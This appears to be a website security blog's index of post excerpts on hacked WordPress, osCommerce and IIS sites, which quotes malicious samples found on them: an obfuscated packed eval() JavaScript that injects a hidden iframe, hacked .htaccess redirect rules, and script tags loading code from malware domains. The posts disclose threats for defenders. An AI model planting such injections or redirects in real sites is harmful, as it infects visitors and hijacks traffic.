How to stop the hacker? This is a very common question we get daily. “My site got hacked, how can I stop the hacker from attacking me again?” Stopping the hacker You can’t really stop the hacker from trying to attack your site, but you can stop him from succeeding in his attempts. Especially [...]
Ugly htaccess
No need to comment: ##!!##!!##!!##!!##!!####!!##!!##!!##!!##!!## RewriteEngine on RewriteCond %{HTTP_USER_AGENT} acs [NC,OR] RewriteCond %{HTTP_USER_AGENT} alav [NC,OR] RewriteCond %{HTTP_USER_AGENT} alca [NC,OR] RewriteCond %{HTTP_USER_AGENT} amoi [NC,OR] RewriteCond %{HTTP_USER_AGENT} audi [NC,OR] RewriteCond %{HTTP_USER_AGENT} aste [NC,OR] RewriteCond %{HTTP_USER_AGENT} avan [NC,OR] RewriteCond %{HTTP_USER_AGENT} benq [NC,OR] RewriteCond %{HTTP_USER_AGENT} bird [NC,OR] RewriteCond %{HTTP_USER_AGENT} blac [NC,OR] RewriteCond %{HTTP_USER_AGENT} blaz [NC,OR] RewriteCond %{HTTP_USER_AGENT} brew [NC,OR] [...]
New .htaccess attacks
Seeing some interesting modifications to the old style of .htaccess attacks. The attackers are using a lot of referer domains and using .in domains (along with the .ru). This is an example of a hacked .htaccess: RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista| msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos| search|metacrawler|bing|dogpile|facebook| twitter|blog|live|myspace|mail|yandex|rambler|ya|aport| linkedin|flickr|nigma|liveinternet|vkontakte| webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km| gigablast|entireweb|amfibi|dmoz|yippy|search| walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut| about|thunderstone|ixquick|terra|lookle| metaeureka|searchspot|slider|topseven|allthesites|libero| clickey|galaxy|brainysearch|pocketflier| verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot |acoon|cyber-content|devaro|fastbot|netzindex| abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv| suchbiene|suchmaschine|web-archiv|web| websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila| sfr|startpagina|kpnvandaag|ilse|wanadoo |telfort|hispavista|passagen|spray|eniro|telia|bluewin| [...]
New Malware – eval(function(p,a,c,k,e,d)
We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware (using Dean Edwards packer). This is what gets added to the hacked sites: <script>eval(function(p,a,c,k,e,d){e=function(c) {return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))}; if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}]; e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+' \b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0); .. 9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px| MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement| iframe|appendChild|src|id|c0m|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent| 1000|hdghdg|navigator|li|showthread|php| 72241732'.split('|'),0,{})) And that code (once decoded by the browser) is used to [...]
SQL injections: nbnjkl.com/urchin.js and jjghui.com/urchin.js
We are seeing many sites compromised with malware from jjghui.com/urchin.js (and now nbnjkl.com/urchin.js). Most of them are IIS/ASP sites and the infection method seems to be similar to the Lizamoon mass infections from a few months ago (SQL injection). This is how it shows on a hacked site: <script src= http://nbnjkl.com/urchin.js ></script> We posted full details [...]
New Malware – sweepstakesandcontestsnow.com
We are seeing many WordPress sites on shared hosts (GoDaddy, Bluehost, Dreamhost and a few others) compromised with a malware from sweepstakesandcontestsnow.com. This is what gets added to the hacked site: <script src="http://sweepstakesandcontestsnow.com/nl.php?nnn=1">.. And that code is used to infect the browser of the person visiting the compromised web site. What is interesting [...]
Malware updates: Aug 2011 – .htaccess to .ru and osa.pl, iframes to .cc and .il
We are often asked what the top domains distributing malware were, or which threats we see most often on our security scanner. For the month of August, things were very similar to the previous months, with a slight increase in the number of WordPress sites compromised due to the Timthumb.php vulnerability. If your site [...]
Malware update – Timthumb.php and .htaccess redirection
We have been very busy in our blog explaining the latest TimThumb.php vulnerability and the effect it is having on WordPress web sites. If you missed the articles, please check here: TimThumb.php – Just the tip of the iceberg Attacks Against Timthumb.php in the Wild – List of Themes and Plugins Being Scanned [...]
osCommerce compromises – Now from tiasissi.com.br
We have been blogging about the “willysy” malware for a little while, but the attacks against osCommerce are still happening and very active. The latest change is that the “willysy.com” (or exero.eu) type of injection has switched to http://tiasissi.com.br/revendedores/jquery/. That’s what shows up on the hacked sites: <script src= http://tiasissi.com.br/revendedores/jquery/> Sucuri identifies those types of web-based [...]
More spam (via .htaccess) to search-box.in and malware from savebotstat.com
Very interesting .htaccess redirection to send traffic from Google and Yahoo image search to search-box.in. That’s what gets added to the hacked site: AddHandler application/x-httpd-php .html .htm .asp .aspx .shtml .shtm RewriteEngine On RewriteOptions inherit RewriteCond %{HTTP_REFERER} .*images.google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*images.search.yahoo.*$ [...]